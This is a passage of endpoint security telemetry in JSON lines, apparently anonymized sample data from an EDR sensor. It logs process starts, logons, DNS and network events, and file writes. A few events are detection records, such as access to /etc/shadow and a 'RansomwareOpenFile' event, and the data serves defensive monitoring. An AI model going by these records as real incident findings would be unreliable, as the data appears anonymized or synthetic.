andleCount":"0","ProcessStartTime":"1604855096.463","ProtectVirtualMemoryCount":"0","QueueApcCount":"0","RawProcessId":"33016","RegKeySecurityDecreasedCount":"0","RemovableDiskFileWrittenCount":"0","RunDllInvocationCount":"0","SHA256HashData":"faceb6f5d1cdc5ad50a4a1b92c4cd3fcdabcf7e8d418014a1b1221c1defa3d8f","ScreenshotsTakenCount":"0","ScriptEngineInvocationCount":"0","ServiceEventCount":"0","SetThreadContextCount":"0","SnapshotFileOpenCount":"0","SuspectStackCount":"0","SuspiciousCredentialModuleLoadCount":"0","SuspiciousDnsRequestCount":"0","SuspiciousFontLoadCount":"0","SuspiciousRawDiskReadCount":"0","TargetProcessId":"3100508103359","UnsignedModuleLoadCount":"0","UserMemoryAllocateExecutableCount":"0","UserMemoryAllocateExecutableRemoteCount":"0","UserMemoryProtectExecutableCount":"0","UserMemoryProtectExecutableRemoteCount":"0","UserSid":"S-1-5-18","UserTime":"6406250","aid":"ffffffffb5db4b2e7ec89aba537adcc2","aip":"208.9.60.157","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"EndOfProcess","id":"ffffffff-1111-11eb-8726-063418e4a9e7","name":"EndOfProcessV15","timestamp":"1604855099935"} -{"AsepWrittenCount":"0","ConfigBuild":"1007.4.0009304.1","ConfigStateHash":"3344040805","ContextProcessId":"311775981885093125","ContextThreadId":"0","ContextTimeStamp":"1604855101.341","DirectoryCreatedCount":"0","DnsRequestCount":"0","Entitlements":"15","ExecutableDeletedCount":"0","FileDeletedCount":"0","NetworkBindCount":"0","NetworkCapableAsepWriteCount":"0","NetworkCloseCount":"0","NetworkConnectCount":"0","NetworkListenCount":"0","NetworkRecvAcceptCount":"0","NewExecutableWrittenCount":"0","RawProcessId":"10507","SHA256HashData":"3b00897e1eb587c5f77e3866ff6bdc80f5e70f839543242e0ee5a1581014adc3","SuspectStackCount":"0","SuspiciousDnsRequestCount":"0","TargetProcessId":"311775981885093125","aid":"ffffffff1aa0482a5ea94f64e08e7b15","aip":"208.14.207.30","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"EndOfProcess","id":"ffffffff-1111-11eb-bc03-065126dd0691","name":"EndOfProcessMacV12","timestamp":"1604855100139"} -{"AuthenticationId":"999","CommandLine":"D:\\projects\\splunk-forwarder\\bin\\splunk-powershell.exe --ps2","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3765958535","EffectiveTransmissionClass":"3","Entitlements":"15","ImageFileName":"\\Device\\HarddiskVolume2\\projects\\splunk-forwarder\\bin\\splunk-powershell.exe","ImageSubsystem":"3","IntegrityLevel":"16384","MD5HashData":"571391f723a439e985a2064337e2802a","ParentAuthenticationId":"999","ParentBaseFileName":"splunkd.exe","ParentProcessId":"17346335177","ProcessCreateFlags":"67634688","ProcessEndTime":"","ProcessParameterFlags":"24577","ProcessStartTime":"1604855099.406","ProcessSxsFlags":"64","RawProcessId":"6116","SHA1HashData":"0000000000000000000000000000000000000000","SHA256HashData":"7f326aad0ee45bfef93daede5597d70422d472084ae3295762654fb5021a8720","SessionId":"0","SourceProcessId":"17346335177","SourceThreadId":"107650023406","Tags":"27, 151, 12094627905582, 12094627906234","TargetProcessId":"583707537390","TokenType":"1","UserSid":"S-1-5-18","WindowFlags":"384","aid":"ffffffff3a5a424fa02450da53619745","aip":"208.216.142.127","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"ProcessRollup2","id":"ffffffff-1111-11eb-a09e-06f79d630255","name":"ProcessRollup2V17","timestamp":"1604855100030"} -{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"2784638081","ContextProcessId":"259090530891","ContextThreadId":"16409623709004","ContextTimeStamp":"1604855095.961","DnsRequestCount":"1","DomainName":"comp1.dom2","DualRequest":"0","EffectiveTransmissionClass":"3","Entitlements":"15","InterfaceIndex":"0","RequestType":"1","aid":"ffffffff4f1444bab96568879cb43556","aip":"208.216.144.255","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"DnsRequest","id":"ffffffff-1111-11eb-8077-0606f7dcf2ed","name":"DnsRequestV3","timestamp":"1604855099913"} -{"ConfigBuild":"1007.8.0009806.1","ConfigStateHash":"4288861242","ContextProcessId":"321385820045701199","ContextThreadId":"0","ContextTimeStamp":"1604855101.645","Entitlements":"15","GID":"0","TargetFileName":"/etc/shadow","UID":"0","UnixMode":"32768","aid":"ffffffff32ba43a483e76c6f0a4aa26f","aip":"208.216.150.197","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Lin","event_simpleName":"CriticalFileAccessed","id":"ffffffff-1111-11eb-b70d-027f9ced2001","name":"CriticalFileAccessedLinV1","timestamp":"1604855102247"} -{"CommandLine":"/usr/bin/plutil -convert xml1 -o - /Applications/Xcode.app/Contents/Developer/Platforms/AppleTVOS.platform/Developer/Library/CoreSimulator/Profiles/Runtimes/tvOS.simruntime/Contents/Resources/RuntimeRoot/System/Library/PrivateFrameworks/DiagnosticExtensions.framework/PlugIns/com.apple.DiagnosticExtensions.CrashLogs.appex/Info.plist","ConfigBuild":"1007.4.0009304.1","ConfigStateHash":"3344040805","Entitlements":"15","GID":"0","ImageFileName":"/usr/bin/plutil","MD5HashData":"d51cef1b288e2032aee9805deff04bfd","MachOSubType":"1","ParentProcessId":"311774817965726568","ProcessEndTime":"","ProcessGroupId":"311774817965726568","ProcessStartTime":"1604855111.240","RGID":"0","RUID":"0","RawProcessId":"10692","SHA1HashData":"0000000000000000000000000000000000000000","SHA256HashData":"3b00897e1eb587c5f77e3866ff6bdc80f5e70f839543242e0ee5a1581014adc3","SVGID":"0","SVUID":"0","SourceProcessId":"311776004953765502","SourceThreadId":"0","Tags":"27, 12094627905582, 12094627906234","TargetProcessId":"311776004953765502","UID":"0","aid":"ffffffff1aa0482a5ea94f64e08e7b15","aip":"208.14.207.30","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"ProcessRollup2","id":"ffffffff-1111-11eb-bc03-065126dd0691","name":"ProcessRollup2MacV3","timestamp":"1604855109180"} -{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3899738370","ContextProcessId":"1546527409909","ContextThreadId":"4711690090889","ContextTimeStamp":"1604855114.133","DesiredAccess":"1180054","EffectiveTransmissionClass":"3","Entitlements":"15","FileAttributes":"0","FileIdentifier":"501ee2c32e53fb43b07f419f3236fb45c29e000000002c00","FileObject":"18446655033844205120","Information":"2","IrpFlags":"2180","MajorFunction":"0","MinorFunction":"0","OperationFlags":"0","Options":"88080484","ShareAccess":"1","Status":"0","TargetFileName":"\\Device\\HarddiskVolume4\\Windows\\Temp\\__PSScriptPolicyTest_dvkjnbka.apn.ps1","aid":"ffffffff8f1e4b77b4dae5debaa1c8bc","aip":"208.216.150.210","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"NewScriptWritten","id":"ffffffff-1111-11eb-80b5-06e11a66e03d","name":"NewScriptWrittenV7","timestamp":"1604855114427"} -{"ConfigBuild":"1007.4.0012205.1","ConfigStateHash":"1306766522","ConnectionDirection":"1","ConnectionFlags":"0","ContextProcessId":"321275232072440993","ContextTimeStamp":"1604855116.421","Entitlements":"15","InContext":"0","LocalAddressIP4":"0.0.0.0","LocalPort":"0","Protocol":"6","RemoteAddressIP4":"208.72.48.107","RemotePort":"443","aid":"ffffffffd4094240a6b1d12aaf304f4f","aip":"208.216.150.211","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"NetworkConnectIP4","id":"ffffffff-1111-11eb-aca9-02683aed2a0d","name":"NetworkConnectIP4MacV5","timestamp":"1604855116502"} -{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"2602391615","ConnectionDirection":"0","ConnectionFlags":"0","ContextProcessId":"223442259384","ContextTimeStamp":"1604855116.849","EffectiveTransmissionClass":"3","Entitlements":"15","InContext":"0","LocalAddressIP4":"208.22.254.101","LocalPort":"53961","Protocol":"6","RemoteAddressIP4":"208.91.140.216","RemotePort":"443","aid":"fffffffff000426eb99afaa2ccdcbc17","aip":"208.216.150.194","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"NetworkConnectIP4","id":"ffffffff-1111-11eb-b0eb-06be7616c211","name":"NetworkConnectIP4V5","timestamp":"1604855116942"} -{"AuthenticationId":"6580764513","AuthenticationPackage":"Negotiate","ClientComputerName":"-","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3011122681","ContextProcessId":"816054990879","ContextThreadId":"52913017705957","ContextTimeStamp":"1604855091.781","EffectiveTransmissionClass":"2","Entitlements":"15","LogonDomain":"NT AUTHORITY","LogonServer":"","LogonTime":"1604855091.781","LogonType":"9","PasswordLastSet":"","RemoteAccount":"1","UserFlags":"0","UserIsAdmin":"0","UserLogonFlags":"12","UserName":"SYSTEM","UserPrincipal":"user4@dom2","UserSid":"S-1-5-18","aid":"ffffffff8d2e4b4f9b21b40633a8d579","aip":"208.216.128.255","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"UserLogon","id":"ffffffff-1111-11eb-a8cf-0649c95cfa1d","name":"UserLogonV8","timestamp":"1604855121077"} -{"AuthenticationId":"2007206396","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3011122681","ContextProcessId":"4415814628770","ContextThreadId":"41392001729898","ContextTimeStamp":"1604855120.785","DiskParentDeviceInstanceId":"PCI\\VEN_1000\u0026DEV_0054\u0026SUBSYS_197615AD\u0026REV_01\\4\u00261f16fef7\u00260\u002600A8","EffectiveTransmissionClass":"3","Entitlements":"15","FileEcpBitmask":"0","FileIdentifier":"b57cb59769dfe71180b4806e6f6e6963ea8902000000cb2c","FileObject":"18446708893089967904","IrpFlags":"1028","IsOnNetwork":"0","IsOnRemovableDisk":"0","IsTransactedFile":"0","MajorFunction":"18","MinorFunction":"0","OperationFlags":"0","SHA256HashData":"d0e1b81f3f3f18256f6447703624019eaee9b1068b3f09323eced4f547cc4182","Size":"6144","TargetFileName":"\\Device\\HarddiskVolume2\\Users\\user10\\AppData\\Local\\Temp\\ec1ijefl.dll","TokenType":"1","aid":"ffffffff2c47454cba360bc404a607bb","aip":"208.216.144.255","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"PeFileWritten","id":"ffffffff-1111-11eb-b091-06f6cca0a049","name":"PeFileWrittenV14","timestamp":"1604855121109"} -{"AuthenticationId":"317005428","AuthenticationPackage":"Negotiate","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3950066843","EffectiveTransmissionClass":"2","Entitlements":"15","LogoffTime":"1604855132.756","LogonDomain":"dom1","LogonServer":"srv2","LogonTime":"1604855131.666","LogonType":"7","PasswordLastSet":"1598119332.510","RemoteAccount":"1","UserFlags":"32","UserIsAdmin":"0","UserLogoffType":"3","UserLogonFlags":"0","UserName":"user4","UserPrincipal":"user.name@dom2.com","UserSid":"S-1-5-21-606747145-1364589140-725345543-28636","aid":"ffffffffe0104823bd3de859d5bc8bc7","aip":"208.216.134.211","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"UserLogoff","id":"ffffffff-1111-11eb-8913-0287fd11c79b","name":"UserLogoffV3","timestamp":"1604855134461"} -{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"537307300","ContextProcessId":"635780922149","ContextThreadId":"9479299143023","ContextTimeStamp":"1604855025.966","DesiredAccess":"1180054","EffectiveTransmissionClass":"3","Entitlements":"15","FileAttributes":"128","FileIdentifier":"0e02a8c7ed9d244887cef0409af0e6190030000000001100","FileObject":"18446695174291796544","Information":"2","IrpFlags":"2180","MajorFunction":"0","MinorFunction":"0","OperationFlags":"0","Options":"83886176","ShareAccess":"3","Status":"0","TargetFileName":"\\Device\\HarddiskVolume4\\Program Files\\Snow Software\\Inventory\\Agent\\cloudmeteringhost.exe","aid":"ffffffff425942f58382dbb11350eeda","aip":"208.216.150.192","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"NewExecutableWritten","id":"ffffffff-1111-11eb-93cb-067deb43537b","name":"NewExecutableWrittenV1","timestamp":"1604855149643"} -{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3765958535","ConnectionDirection":"2","ConnectionFlags":"0","ContextProcessId":"50714198593318","ContextThreadId":"194302491825207","ContextTimeStamp":"1604855150.066","EffectiveTransmissionClass":"3","Entitlements":"15","InContext":"0","LocalAddressIP4":"127.0.0.1","LocalPort":"59491","Protocol":"6","RemoteAddressIP4":"0.0.0.0","RemotePort":"0","aid":"ffffffffa51b4acf9dbc1fc273e6145c","aip":"208.222.216.124","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"NetworkListenIP4","id":"ffffffff-1111-11eb-8726-063418e4a9e7","name":"NetworkListenIP4V5","timestamp":"1604855150545"} -{"ClientComputerName":"com1","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3011122681","ContextProcessId":"7073822473144","ContextThreadId":"48689911139327","ContextTimeStamp":"1604855152.993","EffectiveTransmissionClass":"2","Entitlements":"15","EtwRawProcessId":"744","EtwRawThreadId":"5304","LogonDomain":"BROADCAST","LogonType":"3","RemoteAddressIP4":"208.80.28.100","Status":"3221225581","SubStatus":"3221225578","UserName":"user5","aid":"ffffffffd8844a59acce5e1f4ad01888","aip":"208.216.128.255","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"UserLogonFailed2","id":"ffffffff-1111-11eb-a8aa-067029dffccb","name":"UserLogonFailed2V2","timestamp":"1604855154274"} -{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3343111420","ContextProcessId":"1838383212125","ContextThreadId":"27242382481217","ContextTimeStamp":"1604855151.534","EffectiveTransmissionClass":"3","Entitlements":"15","FileIdentifier":"b0754a8f86feffffb0754a8f86feffff09764a8f86feffff","FileObject":"18446636884348143072","IrpFlags":"1028","MajorFunction":"18","MinorFunction":"0","OperationFlags":"0","TargetFileName":"\\Device\\HarddiskVolume3\\Program Files\\WindowsApps\\Deleted\\Microsoft.Getstarted_9.10.32461.0_x64__8wekyb3d8bbweacf6b996-01b3-402c-bd01-a67529f94699\\clrcompression.dll","aid":"ffffffff4a0946365161093453e596d4","aip":"208.216.150.195","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"ExecutableDeleted","id":"ffffffff-1111-11eb-b23b-064dea059649","name":"ExecutableDeletedV3","timestamp":"1604855154670"} -{"AsepWrittenCount":"0","ConfigBuild":"1007.4.0009202.1","ConfigStateHash":"230795414","ContextProcessId":"318137549555284836","ContextThreadId":"0","ContextTimeStamp":"1604855135.209","DirectoryCreatedCount":"0","DnsRequestCount":"0","Entitlements":"15","ExecutableDeletedCount":"0","FileDeletedCount":"0","NetworkBindCount":"0","NetworkCapableAsepWriteCount":"0","NetworkCloseCount":"0","NetworkConnectCount":"0","NetworkListenCount":"0","NetworkRecvAcceptCount":"0","NewExecutableWrittenCount":"0","RawProcessId":"20195","SHA256HashData":"295fbc2356e8605e804f95cb6d6f992335e247dbf11767fe8781e2a7f889978a","SuspectStackCount":"0","SuspiciousDnsRequestCount":"0","TargetProcessId":"318137549555284836","aid":"ffffffffcfe84e8c6a52c4001bd83761","aip":"208.173.124.176","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"EndOfProcess","id":"ffffffff-1111-11eb-ae31-065d76bec0c3","name":"EndOfProcessMacV11","timestamp":"1604855160047"} -{"ApiReturnValue":"1","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3338885535","ContextProcessId":"683078218537","ContextTimeStamp":"1604855171.731","EffectiveTransmissionClass":"3","Entitlements":"15","EtwRawProcessId":"19400","EtwRawThreadId":"9384","aid":"ffffffff80984ea8b49d9a53f590c566","aip":"208.24.76.36","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"RegisterRawInputDevicesEtw","id":"ffffffff-1111-11eb-a570-0685ba2a382f","name":"RegisterRawInputDevicesEtwV1","timestamp":"1604855173077"} -{"CompletionEventId":"Event_ChannelDataDownloadCompleteV1","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3338885535","DownloadPath":"metahash+/cfs/channelfiles/0000000013/b2acba1a30a3407dae27d0503611022d/C-00000013-00000000-00000408.sys","DownloadPort":"443","DownloadServer":"lfodown01-b.cloudsink.net","EffectiveTransmissionClass":"0","Entitlements":"15","TargetFileName":"C-00000013-00000000-00000408.sys","aid":"ffffffffffc94c645268f64fc900213f","aip":"208.64.212.186","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"LFODownloadConfirmation","id":"ffffffff-1111-11eb-8ab5-0643392fc75d","name":"LFODownloadConfirmationV1","timestamp":"1604855174018"} -{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"1763245019","ContextProcessId":"2071361595421","ContextThreadId":"41650430047375","ContextTimeStamp":"1604855146.590","EffectiveTransmissionClass":"3","Entitlements":"15","FileIdentifier":"4b0121a43dfc1f4ca54eea679ddbcd4eef2103000000ca00","FileObject":"18446622606546437424","IrpFlags":"395312","MajorFunction":"6","MinorFunction":"0","NewFileIdentifier":"4b0121a43dfc1f4ca54eea679ddbcd4eef2103000000ca00","OperationFlags":"0","SourceFileName":"\\Device\\HarddiskVolume3\\Windows\\assembly\\temp\\EKA0UARWWK\\Microsoft.WSMan.Management.ni.dll","TargetFileName":"\\Device\\HarddiskVolume3\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.We0722664#\\c2579d00f9849413b8b7948dd00ac863\\Microsoft.WSMan.Management.ni.dll","aid":"ffffffff280b41b956a91e816bd9b9b0","aip":"208.105.150.175","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"NewExecutableRenamed","id":"ffffffff-1111-11eb-8162-0663305b686f","name":"NewExecutableRenamedV6","timestamp":"1604855177513"} -{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"402097454","ContextProcessId":"66601077523","ContextThreadId":"2500785639062","ContextTimeStamp":"1604855165.213","DesiredAccess":"1048577","EffectiveTransmissionClass":"3","Entitlements":"15","FileAttributes":"128","FileIdentifier":"d2f4250ff1ba3b4ca66e123c5269884ca6f8020000002700","FileObject":"18446641334185168032","Information":"2","IrpFlags":"2180","MajorFunction":"0","MinorFunction":"0","OperationFlags":"0","Options":"35668001","ShareAccess":"3","Status":"0","TargetFileName":"\\Device\\HarddiskVolume3\\Windows\\CbsTemp\\30848497_1904507751\\FodWU","aid":"ffffffff2c9f4066b0b5f2f00265503c","aip":"208.216.128.255","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"DirectoryCreate","id":"ffffffff-1111-11eb-9411-06b7c99be087","name":"DirectoryCreateV1","timestamp":"1604855180332"} -{"AuthenticationId":"999","CommandLine":"C:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s wlidsvc","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3343111420","ContextTimeStamp":"1604855196.468","EffectiveTransmissionClass":"3","Entitlements":"15","ImageFileName":"\\Device\\HarddiskVolume3\\Windows\\System32\\svchost.exe","InterfaceGuid":"367ABB81-9844-35F1-AD32-98F038001003","InterfaceVersion":"131072","RpcClientProcessId":"949196415400","RpcClientThreadId":"44209361549673","RpcNestingLevel":"0","RpcOpNum":"19","ServiceDisplayName":"wlidsvc","TargetProcessId":"955370934902","TokenType":"1","UserName":"user6","aid":"fffffffffcc4413057adc260e99b0774","aip":"208.9.106.189","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"ServiceStarted","id":"ffffffff-1111-11eb-9c98-02c501fe7d81","name":"ServiceStartedV2","timestamp":"1604855196635"} -{"ConfigBuild":"1007.4.0011104.1","ConfigStateHash":"203564169","ConnectionDirection":"0","ConnectionFlags":"0","ContextProcessId":"319255017313886870","ContextTimeStamp":"1604855200.751","Entitlements":"15","InContext":"0","LocalAddressIP6":"0:0:0:0:0:0:0:0","LocalPort":"0","Protocol":"6","RemoteAddressIP6":"0:0:0:0:0:0:0:1","RemotePort":"2181","aid":"ffffffffed0f41575620ab9fb25ce105","aip":"208.62.90.250","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"NetworkConnectIP6","id":"ffffffff-1111-11eb-81f1-061cdebbd115","name":"NetworkConnectIP6MacV5","timestamp":"1604855200836"} -{"AuthenticationId":"1656178821","AuthenticationPackage":"Kerberos","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3338885535","ContextProcessId":"30254389526587","ContextThreadId":"275230771323179","EffectiveTransmissionClass":"2","Entitlements":"15","LogonDomain":"dom1","LogonId":"1656178821","LogonServer":"srv1","LogonTime":"1604855211.249","LogonType":"5","PasswordLastSet":"1530626210.104","RemoteAccount":"1","SessionId":"0","UserCanonical":"","UserFlags":"32","UserIsAdmin":"0","UserLogonFlags":"0","UserName":"user7","UserPrincipal":"user7@dom4.cm","UserSid":"S-1-5-21-606747145-1364589140-725345543-183372","aid":"ffffffff73164cfa9656c4caff8a2a38","aip":"208.216.134.209","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"UserIdentity","id":"ffffffff-1111-11eb-86e3-02db1faa1327","name":"UserIdentityV2","timestamp":"1604855212031"} -{"AuthenticationId":"999","CommandLine":"C:\\WINDOWS\\System32\\svchost.exe -k netsvcs -p -s NetSetupSvc","ConfigBuild":"1007.3.0010609.1","ConfigStateHash":"4193986770","EffectiveTransmissionClass":"3","Entitlements":"15","ImageFileName":"\\Device\\HarddiskVolume3\\Windows\\System32\\svchost.exe","ImageSubsystem":"2","IntegrityLevel":"16384","MD5HashData":"8a0a29438052faed8a2532da50455756","ParentAuthenticationId":"999","ParentProcessId":"2881931477041","ProcessCreateFlags":"525324","ProcessEndTime":"","ProcessParameterFlags":"8193","ProcessStartTime":"1604842733.215","ProcessSxsFlags":"64","RawProcessId":"6160","SHA1HashData":"0000000000000000000000000000000000000000","SHA256HashData":"7fd065bac18c5278777ae44908101cdfed72d26fa741367f0ad4d02020787ab6","SessionId":"0","SourceProcessId":"2881931477041","SourceThreadId":"70316664105336","Tags":"27, 29, 53, 54, 55, 185, 10445360464024, 10445360464025, 10445360464026, 10445360464258, 10445360464273, 10445360464274, 12094627905582, 12094627906234, 211655988347297","TargetProcessId":"2882232404222","TokenType":"2","UserSid":"S-1-5-18","WindowFlags":"128","aid":"ffffffffbe8a46386afe80c5ef64d0b5","aip":"208.65.31.23","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"ProcessRollup2","id":"ffffffff-1111-11eb-b4f9-06e3a7e5503b","name":"ProcessRollup2V16","timestamp":"1604855237946"} -{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"1763245019","ContextProcessId":"1016182570608","ContextThreadId":"37343520154472","ContextTimeStamp":"1604829512.519","DesiredAccess":"1179785","EffectiveTransmissionClass":"3","Entitlements":"15","FileAttributes":"0","FileIdentifier":"7a9c1c1610045d45a54bd6643ac12ea767a5020000000c00","FileObject":"18446670458156489088","Information":"1","IrpFlags":"2180","MajorFunction":"0","MinorFunction":"0","OperationFlags":"0","Options":"16777312","ShareAccess":"5","Status":"0","TargetFileName":"\\Device\\HarddiskVolume3\\Users\\user11\\Downloads\\file.pptx","aid":"ffffffffac4148947ed68497e89f3308","aip":"208.226.182.36","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"RansomwareOpenFile","id":"ffffffff-1111-11eb-9756-06fe7f8f682f","name":"RansomwareOpenFileV4","timestamp":"1604855242091"} -{"AllocateVirtualMemoryCount":"0","ArchiveFileWrittenCount":"0","AsepWrittenCount":"0","BinaryExecutableWrittenCount":"0","CLICreationCount":"0","ConHostId":"13532","ConHostProcessId":"1731198143955","ConfigBuild":"1007.3.0010609.1","ConfigStateHash":"2030177841","ContextData":"","ContextProcessId":"1741732942772","ContextThreadId":"28523520529271","ContextTimeStamp":"1604855274.377","CycleTime":"473618996","DirectoryCreatedCount":"0","DirectoryEnumeratedCount":"0","DnsRequestCount":"0","DocumentFileWrittenCount":"0","EffectiveTransmissionClass":"3","Entitlements":"15","ExeAndServiceCount":"0","ExecutableDeletedCount":"0","ExitCode":"0","FileDeletedCount":"0","GenericFileWrittenCount":"0","ImageSubsystem":"2","InjectedDllCount":"0","InjectedThreadCount":"0","KernelTime":"1406250","MaxThreadCount":"16","ModuleLoadCount":"72","NetworkBindCount":"0","NetworkCapableAsepWriteCount":"0","NetworkCloseCount":"0","NetworkConnectCount":"0","NetworkConnectCountUdp":"0","NetworkListenCount":"0","NetworkModuleLoadCount":"0","NetworkRecvAcceptCount":"0","NewExecutableWrittenCount":"0","ParentProcessId":"1731198143955","PrivilegedProcessHandleCount":"0","ProcessStartTime":"1604855154.465","ProtectVirtualMemoryCount":"0","QueueApcCount":"0","RawProcessId":"18176","RegKeySecurityDecreasedCount":"0","RemovableDiskFileWrittenCount":"0","RunDllInvocationCount":"0","SHA256HashData":"87419b84f34cdb13f699c0f0803c957e48c27ad83334fcad7bac9ad89c0a466f","ScreenshotsTakenCount":"0","ScriptEngineInvocationCount":"0","ServiceEventCount":"0","SetThreadContextCount":"0","SnapshotFileOpenCount":"0","SuspectStackCount":"0","SuspiciousCredentialModuleLoadCount":"0","SuspiciousDnsRequestCount":"0","SuspiciousFontLoadCount":"0","SuspiciousRawDiskReadCount":"0","TargetProcessId":"1741732942772","UnsignedModuleLoadCount":"0","UserMemoryAllocateExecutableCount":"0","UserMemoryAllocateExecutableRemoteCount":"0","UserMemoryProtectExecutableCount":"0","UserMemoryProtectExecutableRemoteCount":"0","UserSid":"S-1-12-1-1647509123-1308660782-3901357462-3999411581","UserTime":"781250","aid":"fffffffffdab492a5a20cd0417395a73","aip":"208.216.134.192","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"EndOfProcess","id":"ffffffff-1111-11eb-b685-0241eaddc553","name":"EndOfProcessV14","timestamp":"1604855276657"} -{"AuthenticationId":"895027","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3338885535","ContextProcessId":"1786917081743","ContextThreadId":"31685015444484","ContextTimeStamp":"1604855317.892","EffectiveTransmissionClass":"3","Entitlements":"15","FileEcpBitmask":"0","FileIdentifier":"0000000000000000be341bb58bc5f1f2a24339010200510e","FileObject":"18446636933702558240","IrpFlags":"1028","IsOnNetwork":"1","IsOnRemovableDisk":"0","MajorFunction":"18","MinorFunction":"0","OperationFlags":"0","Size":"223989","TargetFileName":"\\Device\\Mup\\intranet.dev\\int\\Test.pptx","TokenType":"1","aid":"fffffffffa474d216472f3edb73c75ed","aip":"208.216.134.214","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"OoxmlFileWritten","id":"ffffffff-1111-11eb-9165-067ee18a7975","name":"OoxmlFileWrittenV11","timestamp":"1604855329571"} -{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3765958535","ConnectionDirection":"2","ConnectionFlags":"0","ContextProcessId":"439029805661","ContextThreadId":"273683743193497","ContextTimeStamp":"1604855351.158","EffectiveTransmissionClass":"3","Entitlements":"15","InContext":"0","LocalAddressIP6":"a93:432:ffff:0:c830:b4bf:1e0:ffff","LocalPort":"50373","Protocol":"6","RemoteAddressIP6":"0:0:0:0:0:0:0:0","RemotePort":"0","aid":"ffffffff1f924e228a807ea4c0f21b0b","aip":"208.222.208.124","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"NetworkListenIP6","id":"ffffffff-1111-11eb-85f5-02ab029194b9","name":"NetworkListenIP6V5","timestamp":"1604855351798"} -{"ConfigBuild":"1007.4.0011104.1","ConfigStateHash":"1457965279","ContextProcessId":"321365562189152025","ContextThreadId":"0","ContextTimeStamp":"1604846070.744","Entitlements":"15","SHA256HashData":"e1bed7598ffdecf63a4d240f8309b528fc45068c6cb8137a5090f3afeb57f29d","Size":"29646","TargetFileName":"/System/Library/CoreServices/SecurityAgentPlugins/HomeDirMechanism.bundle/Contents/MacOS/HomeDirMechanism/..namedfork/rsrc","VnodeModificationType":"10","aid":"ffffffff1f32487185fcde66a9dc0528","aip":"208.69.144.69","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"AsepFileChange","id":"ffffffff-1111-11eb-b9b4-063e98f9b19b","name":"AsepFileChangeMacV2","timestamp":"1604855355495"} -{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3011122681","ContextProcessId":"2932136","ContextThreadId":"36157339485804","ContextTimeStamp":"1604855191.803","EffectiveTransmissionClass":"2","Entitlements":"15","LogonTime":"","PasswordLastSet":"","UserLogonFlags":"1","UserName":"user7","UserSid":"S-1-5-10","aid":"ffffffffa5bd4efaa195a7132c576edc","aip":"208.216.128.255","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"UserLogonFailed","id":"ffffffff-1111-11eb-aa5a-0207e26418af","name":"UserLogonFailedV1","timestamp":"1604855193422"} 